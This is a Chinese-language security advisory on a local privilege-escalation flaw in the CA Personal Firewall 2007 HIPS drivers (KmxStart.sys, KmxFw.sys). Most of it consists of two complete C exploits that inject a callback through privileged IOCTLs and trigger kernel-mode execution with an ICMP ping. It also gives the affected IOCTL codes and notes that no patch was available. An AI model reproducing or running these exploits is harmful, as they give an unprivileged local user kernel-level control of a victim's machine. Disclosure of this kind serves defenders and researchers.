发布日期:2006-11-16
更新日期:2006-11-20
受影响系统:
Computer Associates Personal Firewall 2007 描述:
BUGTRAQ ID: 21140
Computer Associates是世界领先的安全厂商,产品包括多种杀毒软件及备份恢复系统。
CA HIPS产品的驱动在实现上存在问题,本地攻击者可能利用此漏洞提升权限。
CA的HIPS Core(KmxStart.sys)和HIPS Firewall(KmxFw.sys)驱动hook了TDI和NDIS。本地非特权用户可以使用一些特权IOCTL覆盖这些驱动中的函数指针,以Ring0权限执行任意代码。
<*来源:Rubén Santamarta
链接:http://secunia.com/advisories/22972/
http://marc.theaimsgroup.com/?l=bugtraq&m=116379521731676&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! ////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
//// Kmxfw.sys
//// Kernel Privilege Escalation #2
//// Exploit
//// Rub閚 Santamarta
//// www.reversemode.com
//// 15/10/2006
//// ONLY FOR EDUCATION PURPOSES
//// NO MODIFICATION ALLOWED.
////////////////////////////////////
/////////////////////
/// Compiling:
/// gcc exploit.c -o exploit -lwsock32
/////////////////////
#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#include <iphlpapi.h>
typedef HANDLE (WINAPI *PIcmpCreateFile)();
typedef DWORD (WINAPI *PIcmpSendEcho2)( HANDLE IcmpHandle,
HANDLE Event,
FARPROC ApcRoutine,
PVOID ApcContext,
IPAddr DestinationAddress,
LPVOID RequestData,
WORD RequestSize,
PIP_OPTION_INFORMATION RequestOptions,
LPVOID ReplyBuffer,
DWORD ReplySize,
DWORD Timeout);
VOID Ring0Function()
{
printf("\n");
printf("-----[RING0]------");
printf("\n");
printf("[*] Message: [.oO Hello From Ring0! Oo.]\n");
printf("[!] Exploit Terminated\n");
printf("-----[RING0]------");
Sleep(50000);
}
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{
DWORD *OutBuff,*InBuff;
DWORD CallBacks[4];
DWORD dwIOCTL,OutSize,InSize,junk,i,dwRetVal;
HANDLE hDevice;
PIcmpSendEcho2 IcmpSendEcho2;
PIcmpCreateFile IcmpCreateFile;
LPVOID ReplyBuffer;
HANDLE hIcmpFile;
char *SendData = "owned!";
if(argc<2)
{
printf("\nusage> exploit.exe 2K or XP\n");
exit(1);
}
if(!strcmp(argv[1],"2K"))
{
IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
,"IcmpSendEcho2");
IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
,"IcmpCreateFile");
}
else
{
IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
,"IcmpSendEcho2");
IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
,"IcmpCreateFile");
}
system("cls");
printf("############################\n");
printf("### CA Personal Firewall ###\n");
printf("##### - Ring0 Exploit - ####\n");
printf("############################\n");
printf("Ruben Santamarta\nwww.reversemode.com\n\n");
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\\\.\\Kmxfw",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] Kmxfw Device Handle [%x]\n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 0x44;
OutBuff = (DWORD *)malloc(OutSize);
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x85000014;
printf("[!] Injecting Malicious Callback\n",dwIOCTL);
CallBacks[0]=0;
CallBacks[1]=(DWORD)Ring0Function;
CallBacks[2]=0;
OutBuff[0]=(DWORD)CallBacks;
OutBuff[1]=(DWORD)CallBacks;
OutBuff[2]=(DWORD)CallBacks;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)OutBuff,0x10,
(LPVOID)OutBuff,0x44,
&junk,
NULL);
printf("[!] Pinging google\n\t->Executing Ring0 Function\n");
hIcmpFile=IcmpCreateFile();
ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
IcmpSendEcho2(hIcmpFile,
NULL,
NULL,
NULL,
inet_addr("66.102.9.99"),
SendData,
sizeof(SendData),
NULL,
ReplyBuffer,
8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
1000);
}
===============================================================================
////////////////////////////////////
///// CA HIPS Engine Drivers
////////////////////////////////////
////
//// Kernel Privilege Escalation #1
//// Exploit
//// Rub閚 Santamarta
//// www.reversemode.com
//// 15/10/2006
//// ONLY FOR EDUCATION PURPOSES
//// NO MODIFICATION ALLOWED.
////////////////////////////////////
/////////////////////
/// Compiling:
/// gcc exploit.c -o exploit -lwsock32
/////////////////////
#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#include <iphlpapi.h>
typedef HANDLE (WINAPI *PIcmpCreateFile)();
typedef DWORD (WINAPI *PIcmpSendEcho2)( HANDLE IcmpHandle,
HANDLE Event,
FARPROC ApcRoutine,
PVOID ApcContext,
IPAddr DestinationAddress,
LPVOID RequestData,
WORD RequestSize,
PIP_OPTION_INFORMATION RequestOptions,
LPVOID ReplyBuffer,
DWORD ReplySize,
DWORD Timeout);
VOID Ring0Function()
{
DWORD CallBacks[6];
DWORD junk;
HANDLE hDevice;
printf("\n");
printf("-----[RING0]------");
printf("\n");
printf("[*] Message: [.oO Hello From Ring0! Oo.]\n");
printf("[!] Cleaning up Hooked Function\n");
CallBacks[0]=0;
CallBacks[1]=0;
CallBacks[2]=0;
CallBacks[3]=0;
CallBacks[4]=0;
CallBacks[5]=0;
CallBacks[6]=0;
hDevice = CreateFile("\\\\.\\Kmxstart",
0,
0,
NULL,
3,
0,
0);
DeviceIoControl(hDevice,
0x85000004,
(LPVOID)CallBacks,0x18,
(LPVOID)CallBacks,0x44,
&junk,
NULL);
printf("[!] Exploit Terminated\n");
printf("-----[RING0]------");
exit(1);
}
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{
DWORD *OutBuff,*InBuff;
DWORD dwIOCTL,OutSize,InSize,junk,i,dwRetVal;
HANDLE hDevice;
PIcmpSendEcho2 IcmpSendEcho2;
PIcmpCreateFile IcmpCreateFile;
LPVOID ReplyBuffer;
HANDLE hIcmpFile;
char *SendData = "owned!";
if(argc<2)
{
printf("\nusage> exploit.exe 2K or XP\n");
exit(1);
}
if(!strcmp(argv[1],"2K"))
{
IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("icmp.dll")
,"IcmpSendEcho2");
IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("icmp.dll")
,"IcmpCreateFile");
}
else
{
IcmpSendEcho2 = (PIcmpSendEcho2)GetProcAddress(LoadLibrary("iphlpapi.dll")
,"IcmpSendEcho2");
IcmpCreateFile = (PIcmpCreateFile)GetProcAddress(LoadLibrary("iphlpapi.dll")
,"IcmpCreateFile");
}
system("cls");
printf("############################\n");
printf("### CA Personal Firewall ###\n");
printf("##### - Ring0 Exploit - ####\n");
printf("############################\n");
printf("Ruben Santamarta\nwww.reversemode.com\n\n");
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\\\.\\Kmxstart",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] Kmxstart Device Handle [%x]\n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 0x44;
OutBuff = (DWORD *)malloc(OutSize);
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x85000004;
printf("[!] Injecting Malicious Callback\n",dwIOCTL);
OutBuff[0]=0;
OutBuff[1]=0;
OutBuff[2]=0;
OutBuff[3]=(DWORD)Ring0Function;
OutBuff[4]=0;
OutBuff[5]=0;
OutBuff[6]=0;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)OutBuff,0x18,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] Pinging google\n\t->Executing Ring0 Function\n");
hIcmpFile=IcmpCreateFile();
ReplyBuffer = (VOID*) malloc(sizeof(ICMP_ECHO_REPLY) + sizeof(SendData));
IcmpSendEcho2(hIcmpFile,
NULL,
NULL,
NULL,
inet_addr("66.102.9.99"),
SendData,
sizeof(SendData),
NULL,
ReplyBuffer,
8*sizeof(SendData) + sizeof(ICMP_ECHO_REPLY),
1000);
}
建议:
厂商补丁:
Computer Associates
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cai.com/ |
